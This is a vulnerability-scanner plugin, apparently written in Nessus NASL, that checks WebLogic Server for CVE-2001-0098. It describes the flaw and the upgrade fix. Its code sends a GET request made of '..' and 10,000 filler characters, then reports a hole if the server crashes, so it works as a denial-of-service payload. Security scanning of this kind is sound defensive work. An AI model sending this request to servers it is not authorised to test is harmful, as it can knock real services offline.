#
# This script was written by Vincent Renardias <vincent@strongholdnet.com>
#
# Licence : GPL v2
#

if(description)
{
 script_id(10697);
 script_bugtraq_id(2138);
 script_version ("$Revision: 1.16 $");
 script_cve_id("CVE-2001-0098");
 name["english"] = "WebLogic Server Buffer dotdot Overflow";
 
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote web server is vulnerable to a buffer overflow attack. 

Description :

Requesting an overly long URL starting with a double dot can crash
certain versions of WebLogic servers or possibly even allow for
arbitrary code execution. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2000-12/0331.html

Solution : 

Upgrade to WebLogic 5.1 with Service Pack 7 or later.

Risk factor : 

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";
 script_description(english:desc["english"]);
 
 summary["english"] = "WebLogic Server DoS";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2001 StrongHoldNet");
 family["english"] = "Remote file access";
 script_family(english:family["english"]);
 script_dependencie("find_service1.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_http_port(default:80);


if(get_port_state(port))
{
 if(http_is_dead(port:port))exit(0);
 soc = http_open_socket(port);
 if(soc)
 {
  buffer = http_get(item:string("..", crap(10000)), port:port);
  send(socket:soc, data:buffer);
  r = http_recv(socket:soc);
  http_close_socket(soc);
  
  if(http_is_dead(port:port))security_hole(port);
 }
}

